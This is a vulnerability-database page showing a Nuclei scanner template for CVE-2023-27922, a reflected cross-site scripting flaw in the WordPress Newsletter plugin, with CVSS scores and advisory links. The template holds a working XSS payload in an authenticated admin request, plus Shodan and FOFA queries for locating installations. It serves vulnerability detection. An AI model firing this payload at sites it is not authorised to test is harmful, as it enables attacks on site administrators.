Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-27922HistoryOct 17, 2023 - 7:20 a.m.
Newsletter < 7.6.9 - Cross-Site Scripting
2023-10-1707:20:28
ProjectDiscovery
github.com
2
cve2023
wpscan
wordpress
wp-plugin
xss
newsletter
authenticated
thenewsletterplugin
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.003 Low
EPSS
Percentile
68.4%
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
id: CVE-2023-27922
info:
name: Newsletter < 7.6.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
reference:
- https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
- https://nvd.nist.gov/vuln/detail/CVE-2023-27922
- https://jvn.jp/en/jp/JVN59341308/
- https://wordpress.org/plugins/newsletter/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-27922
cwe-id: CWE-79
epss-score: 0.00151
epss-percentile: 0.51292
cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: thenewsletterplugin
product: newsletter
framework: wordpress
shodan-query: http.html:/wp-content/plugins/newsletter/
fofa-query: body=/wp-content/plugins/newsletter/
publicwww-query: /wp-content/plugins/newsletter/
tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "text/html")'
- 'contains(tolower(body_2), "_newsletter_")'
- 'contains(body_2, "><script>alert(document_domain)</script>")'
condition: and
# digest: 4b0a00483046022100e9167be2b724059df7c707ba66c0e23021841497843387e22cea0938486d9c22022100b72c351c3b3cd00ab824a438f1cb818d13fbcabf2a0980ae0e165e839b80686a:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2023-27922
2023-05-23 02:15:09
cvelist
cvelist
CVE-2023-27922
2023-05-23 00:00:00
jvn
jvn
wpvulndb
wpvulndb
Newsletter < 7.6.9 - Reflected XSS
2023-03-27 00:00:00
wpexploit
wpexploit
Newsletter < 7.6.9 - Reflected XSS
2023-03-27 00:00:00
prion
prion
Cross site scripting
2023-05-23 02:15:00
nvd
nvd
CVE-2023-27922
2023-05-23 02:15:09
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.003 Low
EPSS
Percentile
68.4%
Related for NUCLEI:CVE-2023-27922